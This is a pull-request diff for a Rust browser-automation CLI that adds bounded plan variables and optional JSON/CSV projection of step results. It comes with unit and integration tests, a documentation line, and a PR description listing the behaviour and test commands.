+    let (value, rows) = projected_value(project, steps)?;
+    let bytes = encode(project, &value)?;
+    if bytes.len() > MAX_PROJECTION_BYTES {
+        return Err(format!(
+            "projected result is {} bytes; the maximum is {MAX_PROJECTION_BYTES}",
+            bytes.len()
+        ));
+    }
+    Ok(Some(ProjectionSummary {
+        format: project.format,
+        file: file_name(project.format).to_string(),
+        rows,
+    }))
+}
+
+pub(crate) fn persist(
+    directory: &Path,
+    plan: &Plan,
+    steps: &[StepReport],
+) -> Result<Option<ProjectionSummary>, String> {
+    let Some(project) = &plan.project else {
+        return Ok(None);
+    };
+    let (value, rows) = projected_value(project, steps)?;
+    let bytes = encode(project, &value)?;
+    if bytes.len() > MAX_PROJECTION_BYTES {
+        return Err(format!(
+            "projected result is {} bytes; the maximum is {MAX_PROJECTION_BYTES}",
+            bytes.len()
+        ));
+    }
+    let file = file_name(project.format);
+    write_private_bytes(&directory.join(file), &bytes)?;
+    Ok(Some(ProjectionSummary {
+        format: project.format,
+        file: file.to_string(),
+        rows,
+    }))
+}
+
+fn projected_value(project: &PlanProject, steps: &[StepReport]) -> Result<(Value, usize), String> {
+    let indexes = steps
+        .iter()
+        .enumerate()
+        .map(|(index, step)| (step.id.clone(), index))
+        .collect::<BTreeMap<_, _>>();
+    let dummy = PlanStep {
+        id: "project".to_string(),
+        tool: "project".to_string(),
+        arguments: Map::new(),
+    };
+    let value = crate::resolve_value(&project.from, &dummy, steps, &indexes, &BTreeMap::new())?;
+    let rows = match (&project.format, &value) {
+        (ProjectFormat::Csv, Value::Array(rows)) => {
+            if rows.len() > MAX_CSV_ROWS {
+                return Err(format!(
+                    "csv projection has {} rows; the maximum is {MAX_CSV_ROWS}",
+                    rows.len()
+                ));
+            }
+            rows.len()
+        }
+        (ProjectFormat::Csv, _) => {
+            return Err("csv projection requires the referenced value to be a JSON array".to_string());
+        }
+        (ProjectFormat::Json, Value::Array(rows)) => rows.len(),
+        (ProjectFormat::Json, _) => 1,
+    };
+    Ok((value, rows))
+}
+
+fn encode(project: &PlanProject, value: &Value) -> Result<Vec<u8>, String> {
+    match project.format {
+        ProjectFormat::Json => serde_json::to_vec_pretty(value)
+            .map(|mut bytes| {
+                bytes.push(b'\n');
+                bytes
+            })
+            .map_err(|error| error.to_string()),
+        ProjectFormat::Csv => encode_csv(value, &project.columns),
+    }
+}
+
+fn encode_csv(value: &Value, columns: &[String]) -> Result<Vec<u8>, String> {
+    let Value::Array(rows) = value else {
+        return Err("csv projection requires a JSON array".to_string());
+    };
+    let headers = if columns.is_empty() {
+        csv_headers(rows)?
+    } else {
+        columns.to_vec()
+    };
+    if headers.len() > MAX_CSV_COLUMNS {
+        return Err(format!(
+            "csv projection has {} columns; the maximum is {MAX_CSV_COLUMNS}",
+            headers.len()
+        ));
+    }
+    let mut out = Vec::new();
+    if !headers.is_empty() {
+        write_csv_row(&mut out, headers.iter().map(String::as_str));
+    }
+    for row in rows {
+        let object = row
+            .as_object()
+            .ok_or_else(|| "csv projection rows must be JSON objects".to_string())?;
+        let cells = headers
+            .iter()
+            .map(|header| match object.get(header) {
+                Some(Value::String(text)) => text.clone(),
+                Some(Value::Null) | None => String::new(),
+                Some(other) => csv_cell(other),
+            })
+            .collect::<Vec<_>>();
+        write_csv_row(&mut out, cells.iter().map(String::as_str));
+    }
+    Ok(out)
+}
+
+fn csv_headers(rows: &[Value]) -> Result<Vec<String>, String> {
+    let Some(first) = rows.first() else {
+        return Ok(Vec::new());
+    };
+    let object = first
+        .as_object()
+        .ok_or_else(|| "csv projection rows must be JSON objects".to_string())?;
+    if object.len() > MAX_CSV_COLUMNS {
+        return Err(format!(
+            "csv projection has {} columns; the maximum is {MAX_CSV_COLUMNS}",
+            object.len()
+        ));
+    }
+    Ok(object.keys().cloned().collect())
+}
+
+fn csv_cell(value: &Value) -> String {
+    match value {
+        Value::String(text) => text.clone(),
+        Value::Number(number) => number.to_string(),
+        Value::Bool(flag) => flag.to_string(),
+        Value::Null => String::new(),
+        other => serde_json::to_string(other).unwrap_or_default(),
+    }
+}
+
+fn write_csv_row<'a, I>(out: &mut Vec<u8>, fields: I)
+where
+    I: IntoIterator<Item = &'a str>,
+{
+    let mut first = true;
+    for field in fields {
+        if !first {
+            out.push(b',');
+        }
+        first = false;
+        write_csv_field(out, field);
+    }
+    out.push(b'\n');
+}
+
+fn write_csv_field(out: &mut Vec<u8>, field: &str) {
+    if field.contains([',', '"', '\n', '\r']) {
+        out.push(b'"');
+        for byte in field.bytes() {
+            if byte == b'"' {
+                out.extend_from_slice(b"\"\"");
+            } else {
+                out.push(byte);
+            }
+        }
+        out.push(b'"');
+    } else {
+        out.extend_from_slice(field.as_bytes());
+    }
+}
+
+fn file_name(format: ProjectFormat) -> &'static str {
+    match format {
+        ProjectFormat::Json => "projection.json",
+        ProjectFormat::Csv => "projection.csv",
+    }
+}
+
+fn write_private_bytes(path: &Path, bytes: &[u8]) -> Result<(), String> {
+    let mut options = std::fs::OpenOptions::new();
+    options.create(true).truncate(true).write(true);
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::OpenOptionsExt as _;
+        options.mode(0o600);
+    }
+    AtomicFile::new(path, AllowOverwrite)
+        .write_with_options(|file| file.write_all(bytes).and_then(|()| file.sync_all()), options)
+        .map_err(std::io::Error::from)
+        .map_err(|error| format!("could not write {}: {error}", path.display()))?;
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::PermissionsExt as _;
+        std::fs::set_permissions(path, std::fs::Permissions::from_mode(0o600))
+            .map_err(|error| format!("could not secure {}: {error}", path.display()))?;
+    }
+    Ok(())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+
+    fn step(id: &str, result: Value) -> StepReport {
+        StepReport {
+            id: id.to_string(),
+            tool: "browser_evaluate".to_string(),
+            ok: true,
+            result: Some(result),
+            error: None,
+        }
+    }
+
+    #[test]
+    fn csv_projection_quotes_commas_and_uses_named_columns() {
+        let plan = Plan {
+            version: 1,
+            variables: BTreeMap::new(),
+            steps: vec![PlanStep {
+                id: "extract".to_string(),
+                tool: "browser_evaluate".to_string(),
+                arguments: Map::new(),
+            }],
+            project: Some(PlanProject {
+                format: ProjectFormat::Csv,
+                from: json!({"$ref":"extract#/items"}),
+                columns: vec!["title".to_string(), "price".to_string()],
+            }),
+        };
+        let steps = [step(
+            "extract",
+            json!({"items":[{"title":"Widget, large","price":12},{"title":"Bolt","price":1}]}),
+        )];
+        let summary = summarize(&plan, &steps).expect("summarize").expect("projected");
+        assert_eq!(summary.file, "projection.csv");
+        assert_eq!(summary.rows, 2);
+        let (value, _) = projected_value(plan.project.as_ref().expect("project"), &steps).expect("value");
+        let csv = encode(plan.project.as_ref().expect("project"), &value).expect("csv");
+        assert_eq!(
+            String::from_utf8(csv).expect("utf8"),
+            "title,price\n\"Widget, large\",12\nBolt,1\n"
+        );
+    }
+}

--- a/crates/horizon-browser-cli/src/run_state.rs
+++ b/crates/horizon-browser-cli/src/run_state.rs
@@ -371,6 +371,16 @@ impl DurableRun {
     /// # Errors
     /// Returns when either terminal artifact cannot be atomically persisted.
     pub fn finish(&mut self, execution: &ExecutionReport) -> Result<(), RunStateError> {
+        if execution.projection.is_some() {
+            let plan = self.load_plan().map_err(|error| {
+                io_error(
+                    "could not load plan for projection".to_string(),
+                    std::io::Error::other(error.to_string()),
+                )
+            })?;
+            crate::project::persist(&self.directory, &plan, &execution.steps)
+                .map_err(|error| io_error("could not write projection".to_string(), std::io::Error::other(error)))?;
+        }
         self.write_json(REPORT_FILE, &self.report(execution), "report")?;
         self.state.status = match execution.stop_reason {
             Some(ExecutionStopReason::Cancelled) => RunStatus::Cancelled,
@@ -984,11 +994,13 @@ mod tests {
     fn plan() -> Plan {
         Plan {
             version: 1,
+            variables: std::collections::BTreeMap::new(),
             steps: vec![PlanStep {
                 id: "panels".to_string(),
                 tool: "browser_list".to_string(),
                 arguments: serde_json::Map::new(),
             }],
+            project: None,
         }
     }
 
@@ -1002,6 +1014,7 @@ mod tests {
             error: None,
             stop_reason: None,
             observability: ObservabilitySummary::default(),
+            projection: None,
         }
     }
 
@@ -1053,6 +1066,7 @@ mod tests {
             error: None,
             stop_reason: None,
             observability: ObservabilitySummary::default(),
+            projection: None,
         };
         run.finish(&report).expect("finish durable run");
         let succeeded: RunState = serde_json::from_slice(&std::fs::read(&run.state_path).expect("terminal state"))
@@ -1535,6 +1549,7 @@ mod tests {
     fn two_step_plan() -> Plan {
         Plan {
             version: 1,
+            variables: std::collections::BTreeMap::new(),
             steps: vec![
                 PlanStep {
                     id: "list".to_string(),
@@ -1547,6 +1562,7 @@ mod tests {
                     arguments: serde_json::Map::new(),
                 },
             ],
+            project: None,
         }
     }
 

--- a/crates/horizon-browser-cli/src/variables.rs
+++ b/crates/horizon-browser-cli/src/variables.rs
@@ -8,7 +8,7 @@ use crate::{PlanError, PlanStep, valid_identifier};
 
 pub(crate) const MAX_VARIABLES: usize = 32;
 const MAX_VARIABLE_BYTES: usize = 4 * 1024;
-const MAX_VARIABLES_TOTAL_BYTES: usize = 32 * 1024;
+const MAX_VARIABLES_TOTAL_BYTES: usize = MAX_VARIABLES * MAX_VARIABLE_BYTES;
 
 pub(crate) fn validate(variables: &BTreeMap<String, Value>) -> Result<(), PlanError> {
     if variables.len() > MAX_VARIABLES {

--- a/crates/horizon-browser-cli/src/variables.rs
+++ b/crates/horizon-browser-cli/src/variables.rs
@@ -1,0 +1,86 @@
+//! Bounded plan literals substituted with `{"$var":"name"}`.
+
+use std::collections::BTreeMap;
+
+use serde_json::Value;
+
+use crate::{PlanError, PlanStep, valid_identifier};
+
+pub(crate) const MAX_VARIABLES: usize = 32;
+const MAX_VARIABLE_BYTES: usize = 4 * 1024;
+const MAX_VARIABLES_TOTAL_BYTES: usize = 32 * 1024;
+
+pub(crate) fn validate(variables: &BTreeMap<String, Value>) -> Result<(), PlanError> {
+    if variables.len() > MAX_VARIABLES {
+        return Err(PlanError::TooManyVariables {
+            actual: variables.len(),
+            maximum: MAX_VARIABLES,
+        });
+    }
+    let mut total = 0_usize;
+    for (name, value) in variables {
+        if !valid_identifier(name) {
+            return Err(PlanError::InvalidVariableName(name.clone()));
+        }
+        if value_contains_substitution(value) {
+            return Err(PlanError::InvalidVariableName(format!(
+                "{name}: variable values must be JSON literals, not $ref or $var"
+            )));
+        }
+        let encoded = serde_json::to_vec(value).map_err(|error| PlanError::InvalidVariableName(error.to_string()))?;
+        if encoded.len() > MAX_VARIABLE_BYTES {
+            return Err(PlanError::VariableTooLarge {
+                name: name.clone(),
+                actual: encoded.len(),
+                maximum: MAX_VARIABLE_BYTES,
+            });
+        }
+        total = total.saturating_add(encoded.len());
+        if total > MAX_VARIABLES_TOTAL_BYTES {
+            return Err(PlanError::VariablesTooLarge {
+                actual: total,
+                maximum: MAX_VARIABLES_TOTAL_BYTES,
+            });
+        }
+    }
+    Ok(())
+}
+
+pub(crate) fn lookup(variables: &BTreeMap<String, Value>, step: &PlanStep, name: &str) -> Result<Value, PlanError> {
+    variables.get(name).cloned().ok_or_else(|| PlanError::UnknownVariable {
+        step: step.id.clone(),
+        name: name.to_string(),
+    })
+}
+
+fn value_contains_substitution(value: &Value) -> bool {
+    match value {
+        Value::Array(values) => values.iter().any(value_contains_substitution),
+        Value::Object(object) => {
+            object.contains_key("$ref")
+                || object.contains_key("$var")
+                || object.values().any(value_contains_substitution)
+        }
+        _ => false,
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+
+    #[test]
+    fn rejects_too_many_or_nested_substitutions() {
+        let mut variables = BTreeMap::new();
+        for index in 0..=MAX_VARIABLES {
+            variables.insert(format!("v{index}"), json!(index));
+        }
+        assert!(matches!(
+            validate(&variables),
+            Err(PlanError::TooManyVariables { actual, .. }) if actual == MAX_VARIABLES + 1
+        ));
+        let nested = BTreeMap::from([("url".to_string(), json!({"$var":"other"}))]);
+        assert!(matches!(validate(&nested), Err(PlanError::InvalidVariableName(_))));
+    }
+}

--- a/crates/horizon-browser-cli/tests/cli.rs
+++ b/crates/horizon-browser-cli/tests/cli.rs
@@ -141,6 +141,32 @@ fn run_projects_json_from_a_prior_step() {
     );
 }
 
+#[test]
+fn run_fails_when_a_requested_projection_cannot_be_produced() {
+    let root = tempfile::tempdir().expect("isolated root");
+    let plan = root.path().join("plan.json");
+    std::fs::write(
+        &plan,
+        br#"{"version":1,"steps":[{"id":"panels","tool":"browser_list"}],"project":{"format":"json","from":{"$ref":"panels#/missing"}}}"#,
+    )
+    .expect("write plan");
+
+    let output = run_command(root.path(), ["run", plan.to_str().expect("UTF-8 path")]);
+    assert_eq!(output.status.code(), Some(1));
+    let report: Value = serde_json::from_slice(&output.stdout).expect("stdout report");
+    assert_eq!(report["ok"], false);
+    assert!(report.get("projection").is_none());
+    assert!(
+        report["error"]
+            .as_str()
+            .is_some_and(|error| error.contains("did not match")),
+        "error: {}",
+        report["error"]
+    );
+    let job_dir = std::path::PathBuf::from(report["job_dir"].as_str().expect("job directory"));
+    assert!(!job_dir.join("projection.json").is_file());
+}
+
 fn assert_checkpoint_artifact(job_dir: &std::path::Path, state: &Value, expected: &Value) {
     assert!(state["checkpoint"]["completed"][0].get("result").is_none());
     let checkpoint_report = job_dir.join(

--- a/crates/horizon-browser-cli/tests/cli.rs
+++ b/crates/horizon-browser-cli/tests/cli.rs
@@ -112,6 +112,35 @@ fn run_writes_the_same_structured_report_to_stdout_or_a_private_file() {
     assert!(failed_state["checkpoint"].get("completed").is_none());
 }
 
+#[test]
+fn run_projects_json_from_a_prior_step() {
+    let root = tempfile::tempdir().expect("isolated root");
+    let plan = root.path().join("plan.json");
+    std::fs::write(
+        &plan,
+        br#"{"version":1,"variables":{"note":"list-only"},"steps":[{"id":"panels","tool":"browser_list"}],"project":{"format":"json","from":{"$ref":"panels#/panels"}}}"#,
+    )
+    .expect("write plan");
+
+    let output = run_command(root.path(), ["run", plan.to_str().expect("UTF-8 path")]);
+    assert!(
+        output.status.success(),
+        "stderr: {}",
+        String::from_utf8_lossy(&output.stderr)
+    );
+    let report: Value = serde_json::from_slice(&output.stdout).expect("stdout report");
+    assert_eq!(report["ok"], true);
+    assert_eq!(report["projection"]["format"], "json");
+    assert_eq!(report["projection"]["file"], "projection.json");
+    assert_eq!(report["projection"]["rows"], 0);
+    let job_dir = std::path::PathBuf::from(report["job_dir"].as_str().expect("job directory"));
+    assert_eq!(
+        serde_json::from_slice::<Value>(&std::fs::read(job_dir.join("projection.json")).expect("projection"))
+            .expect("decode projection"),
+        json!([])
+    );
+}
+
 fn assert_checkpoint_artifact(job_dir: &std::path::Path, state: &Value, expected: &Value) {
     assert!(state["checkpoint"]["completed"][0].get("result").is_none());
     let checkpoint_report = job_dir.join(

--- a/docs/architecture/maintainability.md
+++ b/docs/architecture/maintainability.md
@@ -617,6 +617,8 @@ back into large multi-purpose modules.
 - `standalone/lease.rs` records keep-alive host identity, process-start identity,
   and creation order so resume can reconnect to the newest live browser or fail
   closed after a crash or PID reuse.
+- `variables.rs` validates bounded plan literals; `project.rs` writes optional
+  JSON/CSV projections of prior structured results.
 
 ### `horizon-ui`
 


### PR DESCRIPTION
## Purpose

Next independently testable [#324](https://github.com/peters/horizon/issues/324) slice after keep-alive reconnect: bounded plan variables beyond `$ref`, optional JSON/CSV result projection, and checked navigation/extraction/interaction/network-monitoring examples.

## Behavior

- Plans may declare `variables` (≤32 names, 4 KiB each). `{"$var":"name"}` substitutes a JSON literal into tool arguments.
- Optional `project` writes `projection.json` or `projection.csv` into the job directory from a `$ref` after the referenced step succeeds. CSV requires an array of objects; `columns` selects fields.
- Existing `$ref` plans are unchanged. Projection is omitted when not requested; a requested projection that cannot be produced fails an otherwise successful run.
- Examples: `crates/horizon-browser-cli/examples/{navigate,extract,interact,network-watch}.json`.

## Test evidence

- `cargo fmt --all -- --check`
- `./scripts/check-maintainability.sh`
- `cargo clippy --all-targets --features speech,trace-profiling -- -D warnings`
- `cargo clippy --workspace --lib --bins --examples --features speech -- -D warnings -D clippy::unwrap_used -D clippy::expect_used`
- `RUSTFLAGS="-D warnings" cargo test --workspace`
- `cargo test -p horizon-browser-cli` including `run_projects_json_from_a_prior_step`

Does not start a real browser; the CLI integration uses `browser_list` on an empty actor-scoped environment.